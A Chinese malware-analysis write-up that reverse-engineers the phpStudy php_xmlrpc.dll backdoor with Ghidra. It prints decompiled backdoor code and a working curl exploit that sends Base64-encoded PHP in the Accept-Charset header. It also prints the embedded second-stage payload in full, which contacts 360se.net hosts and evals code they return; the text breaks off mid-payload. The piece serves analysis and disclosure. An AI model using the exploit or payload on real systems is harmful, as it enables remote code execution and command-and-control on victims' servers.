作者:lu4nx@知道创宇404积极防御实验室
作者博客:《使用 Ghidra 分析 phpStudy 后门》
原文链接:https://paper.seebug.org/1058/
这次事件已过去数日,该响应的也都响应了,虽然网上有很多厂商及组织发表了分析文章,但记载分析过程的不多,我只是想正儿八经用 Ghidra 从头到尾分析下。
1 工具和平台
主要工具:
-
Kali Linux
-
Ghidra 9.0.4
-
010Editor 9.0.2
样本环境:
-
Windows7
-
phpStudy 20180211
2 分析过程
先在 Windows 7 虚拟机中安装 PhpStudy 20180211,然后把安装完后的目录拷贝到 Kali Linux 中。
根据网上公开的信息:后门存在于 php_xmlrpc.dll 文件中,里面存在“eval”关键字,文件 MD5 为 c339482fd2b233fb0a555b629c0ea5d5。
因此,先去找到有后门的文件:
lu4nx@lx-kali:/tmp/phpStudy$ find ./ -name php_xmlrpc.dll -exec md5sum {} \;3d2c61ed73e9bb300b52a0555135f2f7 ./PHPTutorial/php/php-7.2.1-nts/ext/php_xmlrpc.dll7c24d796e0ae34e665adcc6a1643e132 ./PHPTutorial/php/php-7.1.13-nts/ext/php_xmlrpc.dll3ff4ac19000e141fef07b0af5c36a5a3 ./PHPTutorial/php/php-5.4.45-nts/ext/php_xmlrpc.dllc339482fd2b233fb0a555b629c0ea5d5 ./PHPTutorial/php/php-5.4.45/ext/php_xmlrpc.dll5db2d02c6847f4b7e8b4c93b16bc8841 ./PHPTutorial/php/php-7.0.12-nts/ext/php_xmlrpc.dll42701103137121d2a2afa7349c233437 ./PHPTutorial/php/php-5.3.29-nts/ext/php_xmlrpc.dll0f7ad38e7a9857523dfbce4bce43a9e9 ./PHPTutorial/php/php-5.2.17/ext/php_xmlrpc.dll149c62e8c2a1732f9f078a7d17baed00 ./PHPTutorial/php/php-5.5.38/ext/php_xmlrpc.dllfc118f661b45195afa02cbf9d2e57754 ./PHPTutorial/php/php-5.6.27-nts/ext/php_xmlrpc.dll
将文件 ./PHPTutorial/php/php-5.4.45/ext/php_xmlrpc.dll 单独拷贝出来,再确认下是否存在后门:
lu4nx@lx-kali:/tmp/phpStudy$ strings ./PHPTutorial/php/php-5.4.45/ext/php_xmlrpc.dll | grep evalzend_eval_string@eval(%s('%s'));%s;@eval(%s('%s'));
从上面的搜索结果可以看到文件中存在三个“eval”关键字,现在用 Ghidra 载入分析。
在 Ghidra 中搜索下:菜单栏“Search” > “For Strings”,弹出的菜单按“Search”,然后在结果过滤窗口中过滤“eval”字符串,如图:
从上方结果“Code”字段看的出这三个关键字都位于文件 Data 段中。随便选中一个(我选的“@eval(%s(‘%s’));”)并双击,跳转到地址中,然后查看哪些地方引用过这个字符串(右击,References > Show References to Address),操作如图:
结果如下:
可看到这段数据在 PUSH 指令中被使用,应该是函数调用,双击跳转到汇编指令处,然后 Ghidra 会自动把汇编代码转成较高级的伪代码并呈现在 Decompile 窗口中:
如果没有看到 Decompile 窗口,在菜单Window > Decompile 中打开。
在翻译后的函数 FUN_100031f0 中,我找到了前面搜索到的三个 eval 字符,说明这个函数中可能存在多个后门(当然经过完整分析后存在三个后门)。
这里插一句,Ghidra 转换高级代码能力比 IDA 的 Hex-Rays Decompiler 插件要差一些,比如 Ghidra 转换的这段代码:
puVar8 = local_19f; while (iVar5 != 0) { iVar5 = iVar5 + -1; *puVar8 = 0; puVar8 = puVar8 + 1; }
在IDA中翻译得就很直观:
memset(&v27, 0, 0xB0u);
还有对多个逻辑的判断,IDA 翻译出来是:
if (a && b){ ... }
Ghidra 翻译出来却是:
if (a) { if(b) { } }
而多层 if 嵌套阅读起来会经常迷路。总之 Ghidra 翻译的代码只有反复阅读后才知道是干嘛的,在理解这类代码上我花了好几个小时。
2.1 第一个远程代码执行的后门
第一个后门存在于这段代码:
iVar5 = zend_hash_find(*(int *)(*param_3 + -4 + *(int *)executor_globals_id_exref * 4) + 0xd8, s__SERVER_1000ec9c,~uVar6,&local_14); if (iVar5 != -1) { uVar6 = 0xffffffff; pcVar9 = s_HTTP_ACCEPT_ENCODING_1000ec84; do { if (uVar6 == 0) break; uVar6 = uVar6 - 1; cVar1 = *pcVar9; pcVar9 = pcVar9 + 1; } while (cVar1 != '\0'); iVar5 = zend_hash_find(*(undefined4 *)*local_14,s_HTTP_ACCEPT_ENCODING_1000ec84,~uVar6,&local_28 ); if (iVar5 != -1) { pcVar9 = s_gzip,deflate_1000ec74; pbVar4 = *(byte **)*local_28; pbVar7 = pbVar4; do { bVar2 = *pbVar7; bVar11 = bVar2 < (byte)*pcVar9; if (bVar2 != *pcVar9) { LAB_10003303: iVar5 = (1 - (uint)bVar11) - (uint)(bVar11 != false); goto LAB_10003308; } if (bVar2 == 0) break; bVar2 = pbVar7[1]; bVar11 = bVar2 < ((byte *)pcVar9)[1]; if (bVar2 != ((byte *)pcVar9)[1]) goto LAB_10003303; pbVar7 = pbVar7 + 2; pcVar9 = (char *)((byte *)pcVar9 + 2); } while (bVar2 != 0); iVar5 = 0; LAB_10003308: if (iVar5 == 0) { uVar6 = 0xffffffff; pcVar9 = s__SERVER_1000ec9c; do { if (uVar6 == 0) break; uVar6 = uVar6 - 1; cVar1 = *pcVar9; pcVar9 = pcVar9 + 1; } while (cVar1 != '\0'); iVar5 = zend_hash_find(*(int *)(*param_3 + -4 + *(int *)executor_globals_id_exref * 4) + 0xd8,s__SERVER_1000ec9c,~uVar6,&local_14); if (iVar5 != -1) { uVar6 = 0xffffffff; pcVar9 = s_HTTP_ACCEPT_CHARSET_1000ec60; do { if (uVar6 == 0) break; uVar6 = uVar6 - 1; cVar1 = *pcVar9; pcVar9 = pcVar9 + 1; } while (cVar1 != '\0'); iVar5 = zend_hash_find(*(undefined4 *)*local_14,s_HTTP_ACCEPT_CHARSET_1000ec60,~uVar6, &local_1c); if (iVar5 != -1) { uVar6 = 0xffffffff; pcVar9 = *(char **)*local_1c; do { if (uVar6 == 0) break; uVar6 = uVar6 - 1; cVar1 = *pcVar9; pcVar9 = pcVar9 + 1; } while (cVar1 != '\0'); local_10 = FUN_100040b0((int)*(char **)*local_1c,~uVar6 - 1); if (local_10 != (undefined4 *)0x0) { iVar5 = *(int *)(*param_3 + -4 + *(int *)executor_globals_id_exref * 4); local_24 = *(undefined4 *)(iVar5 + 0x128); *(undefined **)(iVar5 + 0x128) = local_ec; iVar5 = _setjmp3(local_ec,0); uVar3 = local_24; if (iVar5 == 0) { zend_eval_string(local_10,0,&DAT_10012884,param_3); } else { *(undefined4 *) (*(int *)(*param_3 + -4 + *(int *)executor_globals_id_exref * 4) + 0x128) = local_24; } *(undefined4 *) (*(int *)(*param_3 + -4 + *(int *)executor_globals_id_exref * 4) + 0x128) = uVar3; } } } } } }
阅读起来非常复杂,大概逻辑就是通过 PHP 的 zend_hash_find
函数寻找 $_SERVER
变量,然后找到 Accept-Encoding 和 Accept-Charset 两个 HTTP 请求头,如果 Accept-Encoding 的值为 gzip,deflate,就调用 zend_eval_string
去执行 Accept-Encoding 的内容:
zend_eval_string(local_10,0,&DAT_10012884,param_3);
这里 zend_eval_string 执行的是 local_10 变量的内容,local_10 是通过调用一个函数赋值的:
local_10 = FUN_100040b0((int)*(char **)*local_1c,~uVar6 - 1);
函数 FUN_100040b0 最后分析出来是做 Base64 解码的。
到这里,就知道该如何构造 Payload 了:
Accept-Encoding: gzip,deflate Accept-Charset: Base64加密后的PHP代码
朝虚拟机构造一个请求:
$ curl -H "Accept-Charset: $(echo 'system("ipconfig");' | base64)" -H 'Accept-Encoding: gzip,deflate' 192.168.128.6
结果如图:
2.2 第二处后门
沿着伪代码继续分析,看到这一段代码:
if (iVar5 == 0) { puVar8 = &DAT_1000d66c; local_8 = &DAT_10012884; piVar10 = &DAT_1000d66c; do { if (*piVar10 == 0x27) { (&DAT_10012884)[iVar5] = 0x5c; (&DAT_10012885)[iVar5] = *(undefined *)puVar8; iVar5 = iVar5 + 2; piVar10 = piVar10 + 2; } else { (&DAT_10012884)[iVar5] = *(undefined *)puVar8; iVar5 = iVar5 + 1; piVar10 = piVar10 + 1; } puVar8 = puVar8 + 1; } while ((int)puVar8 < 0x1000e5c4); spprintf(&local_20,0,s_$V='%s';$M='%s';_1000ec3c,&DAT_100127b8,&DAT_10012784); spprintf(&local_8,0,s_%s;@eval(%s('%s'));_1000ec28,local_20,s_gzuncompress_1000d018, local_8); iVar5 = *(int *)(*param_3 + -4 + *(int *)executor_globals_id_exref * 4); local_10 = *(undefined4 **)(iVar5 + 0x128); *(undefined **)(iVar5 + 0x128) = local_6c; iVar5 = _setjmp3(local_6c,0); uVar3 = local_10; if (iVar5 == 0) { zend_eval_string(local_8,0,&DAT_10012884,param_3); } else { *(undefined4 **) (*(int *)(*param_3 + -4 + *(int *)executor_globals_id_exref * 4) + 0x128) = local_10; } *(undefined4 *)(*(int *)(*param_3 + -4 + *(int *)executor_globals_id_exref * 4) + 0x128) = uVar3; return 0; }
重点在这段:
puVar8 = &DAT_1000d66c; local_8 = &DAT_10012884; piVar10 = &DAT_1000d66c; do { if (*piVar10 == 0x27) { (&DAT_10012884)[iVar5] = 0x5c; (&DAT_10012885)[iVar5] = *(undefined *)puVar8; iVar5 = iVar5 + 2; piVar10 = piVar10 + 2; } else { (&DAT_10012884)[iVar5] = *(undefined *)puVar8; iVar5 = iVar5 + 1; piVar10 = piVar10 + 1; } puVar8 = puVar8 + 1; } while ((int)puVar8 < 0x1000e5c4);
变量 puVar8 是作为累计变量,这段代码像是拷贝地址 0x1000d66c 至 0x1000e5c4 之间的数据,于是选中切这行代码:
puVar8 = &DAT_1000d66c;
双击 DAT_1000d66c,Ghidra 会自动跳转到该地址,然后在菜单选择 Window > Bytes 来打开十六进制窗口,现已处于地址 0x1000d66c,接下来要做的就是把 0x1000d66c~0x1000e5c4 之间的数据拷贝出来:
-
选择菜单 Select > Bytes;
-
弹出的窗口中勾选“To Address”,然后在右侧的“Ending Address”中填入 0x1000e5c4,如图:
按回车后,这段数据已被选中,我把它们单独拷出来,点击右键,选择 Copy Special > Byte String (No Spaces),如图:
然后打开 010Editor 编辑器:
-
新建文件:File > New > New Hex File;
-
粘贴拷贝的十六进制数据:Edit > Paste From > Paste from Hex Text
然后,把“00”字节全部去掉,选择 Search > Replace,查找 00,Replace 那里不填,点“Replace All”,处理后如下:
把处理后的文件保存为 p1。通过 file 命令得知文件 p1 为 Zlib 压缩后的数据:
$ file p1 p1: zlib compressed data
用 Python 的 zlib 库就可以解压,解压代码如下:
import zlibwith open("p1", "rb") as f: data = f.read() print(zlib.decompress(data))
执行结果如下:
lu4nx@lx-kali:/tmp$ python3 decom.py b"$i='info^_^'.base64_encode($V.''.$M.'').'==END==';$zzz='-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------';@eval(base64_decode('QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpOwplcnJvcl9yZXBvcnRpbmcoMCk7CmZ1bmN0aW9uIHRjcEdldCgkc2VuZE1zZyA9ICcnLCAkaXAgPSAnMzYwc2UubmV0JywgJHBvcnQgPSAnMjAxMjMnKXsKCSRyZXN1bHQgPSAiIjsKICAkaGFuZGxlID0gc3RyZWFtX3NvY2tldF9jbGllbnQoInRjcDovL3skaXB9OnskcG9ydH0iLCAkZXJybm8sICRlcnJzdHIsMTApOyAKICBpZiggISRoYW5kbGUgKXsKICAgICRoYW5kbGUgPSBmc29ja29wZW4oJGlwLCBpbnR2YWwoJHBvcnQpLCAkZXJybm8sICRlcnJzdHIsIDUpOwoJaWYoICEkaGFuZGxlICl7CgkJcmV0dXJuICJlcnIiOwoJfQogIH0KICBmd3JpdGUoJGhhbmRsZSwgJHNlbmRNc2cuIlxuIik7Cgl3aGlsZSghZmVvZigkaGFuZGxlKSl7CgkJc3RyZWFtX3NldF90aW1lb3V0KCRoYW5kbGUsIDIpOwoJCSRyZXN1bHQgLj0gZnJlYWQoJGhhbmRsZSwgMTAyNCk7CgkJJGluZm8gPSBzdHJlYW1fZ2V0X21ldGFfZGF0YSgkaGFuZGxlKTsKCQlpZiAoJGluZm9bJ3RpbWVkX291dCddKSB7CgkJICBicmVhazsKCQl9CgkgfQogIGZjbG9zZSgkaGFuZGxlKTsgCiAgcmV0dXJuICRyZXN1bHQ7IAp9CgokZHMgPSBhcnJheSgid3d3IiwiYmJzIiwiY21zIiwiZG93biIsInVwIiwiZmlsZSIsImZ0cCIpOwokcHMgPSBhcnJheSgiMjAxMjMiLCI0MDEyNSIsIjgwODAiLCI4MCIsIjUzIik7CiRuID0gZmFsc2U7CmRvIHsKCSRuID0gZmFsc2U7Cglmb3JlYWNoICgkZHMgYXMgJGQpewoJCSRiID0gZmFsc2U7CgkJZm9yZWFjaCAoJHBzIGFzICRwKXsKCQkJJHJlc3VsdCA9IHRjcEdldCgkaSwkZC4iLjM2MHNlLm5ldCIsJHApOyAKCQkJaWYgKCRyZXN1bHQgIT0gImVyciIpewoJCQkJJGIgPXRydWU7CgkJCQlicmVhazsKCQkJfQoJCX0KCQlpZiAoJGIpYnJlYWs7Cgl9CgkkaW5mbyA9IGV4cGxvZGUoIjxePiIsJHJlc3VsdCk7CglpZiAoY291bnQoJGluZm8pPT00KXsKCQlpZiAoc3RycG9zKCRpbmZvWzNdLCIvKk9uZW1vcmUqLyIpICE9PSBmYWxzZSl7CgkJCSRpbmZvWzNdID0gc3RyX3JlcGxhY2UoIi8qT25lbW9yZSovIiwiIiwkaW5mb1szXSk7CgkJCSRuPXRydWU7CgkJfQoJCUBldmFsKGJhc2U2NF9kZWNvZGUoJGluZm9bM10pKTsKCX0KfXdoaWxlKCRuKTs='));"
用 base64 命令把这段 Base64 代码解密,过程及结果如下:
lu4nx@lx-kali:/tmp$ echo 'QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpOwplcnJvcl9yZXBvcnRpbmcoMCk7CmZ1bmN0aW9uIHRjcEdldCgkc2VuZE1zZyA9ICcnLCAkaXAgPSAnMzYwc2UubmV0JywgJHBvcnQgPSAnMjAxMjMnKXsKCSRyZXN1bHQgPSAiIjsKICAkaGFuZGxlID0gc3RyZWFtX3NvY2tldF9jbGllbnQoInRjcDovL3skaXB9OnskcG9ydH0iLCAkZXJybm8sICRlcnJzdHIsMTApOyAKICBpZiggISRoYW5kbGUgKXsKICAgICRoYW5kbGUgPSBmc29ja29wZW4oJGlwLCBpbnR2YWwoJHBvcnQpLCAkZXJybm8sICRlcnJzdHIsIDUpOwoJaWYoICEkaGFuZGxlICl7CgkJcmV0dXJuICJlcnIiOwoJfQogIH0KICBmd3JpdGUoJGhhbmRsZSwgJHNlbmRNc2cuIlxuIik7Cgl3aGlsZSghZmVvZigkaGFuZGxlKSl7CgkJc3RyZWFtX3NldF90aW1lb3V0KCRoYW5kbGUsIDIpOwoJCSRyZXN1bHQgLj0gZnJlYWQoJGhhbmRsZSwgMTAyNCk7CgkJJGluZm8gPSBzdHJlYW1fZ2V0X21ldGFfZGF0YSgkaGFuZGxlKTsKCQlpZiAoJGluZm9bJ3RpbWVkX291dCddKSB7CgkJICBicmVhazsKCQl9CgkgfQogIGZjbG9zZSgkaGFuZGxlKTsgCiAgcmV0dXJuICRyZXN1bHQ7IAp9CgokZHMgPSBhcnJheSgid3d3IiwiYmJzIiwiY21zIiwiZG93biIsInVwIiwiZmlsZSIsImZ0cCIpOwokcHMgPSBhcnJheSgiMjAxMjMiLCI0MDEyNSIsIjgwODAiLCI4MCIsIjUzIik7CiRuID0gZmFsc2U7CmRvIHsKCSRuID0gZmFsc2U7Cglmb3JlYWNoICgkZHMgYXMgJGQpewoJCSRiID0gZmFsc2U7CgkJZm9yZWFjaCAoJHBzIGFzICRwKXsKCQkJJHJlc3VsdCA9IHRjcEdldCgkaSwkZC4iLjM2MHNlLm5ldCIsJHApOyAKCQkJaWYgKCRyZXN1bHQgIT0gImVyciIpewoJCQkJJGIgPXRydWU7CgkJCQlicmVhazsKCQkJfQoJCX0KCQlpZiAoJGIpYnJlYWs7Cgl9CgkkaW5mbyA9IGV4cGxvZGUoIjxePiIsJHJlc3VsdCk7CglpZiAoY291bnQoJGluZm8pPT00KXsKCQlpZiAoc3RycG9zKCRpbmZvWzNdLCIvKk9uZW1vcmUqLyIpICE9PSBmYWxzZSl7CgkJCSRpbmZvWzNdID0gc3RyX3JlcGxhY2UoIi8qT25lbW9yZSovIiwiIiwkaW5mb1szXSk7CgkJCSRuPXRydWU7CgkJfQoJCUBldmFsKGJhc2U2NF9kZWNvZGUoJGluZm9bM10pKTsKCX0KfXdoaWxlKCRuKTs=' | base64 -d@ini_set("display_errors","0");error_reporting(0);function tcpGet($sendMsg = '', $ip = '360se.net', $port = '20123'){ $result = ""; $handle = stream_socket_client("tcp://{$ip}:{$port}", $errno, $errstr,10); if( !$handle ){ $handle = fsockopen($ip, intval($port), $errno, $errstr, 5); if( !$handle ){ return "err"; } } fwrite($handle, $sendMsg."\n"); while(!feof($handle)){ stream_set_timeout($handle, 2); $result .= fread($handle, 1024); $info = stream_get_meta_data($handle); if ($info['timed_out']) { break; } } fclose($handle); return $result;}$ds = array("www","bbs","cms","down","up","file","ftp");$ps = array("20123","40125","8080","80","53");$n = false;do { $n = false; foreach ($ds as $d){ $b = false; foreach ($ps as $p){ $result = tcpGet($i,$d.".360se.net",$p); if ($result != "err"){ $b =true; break;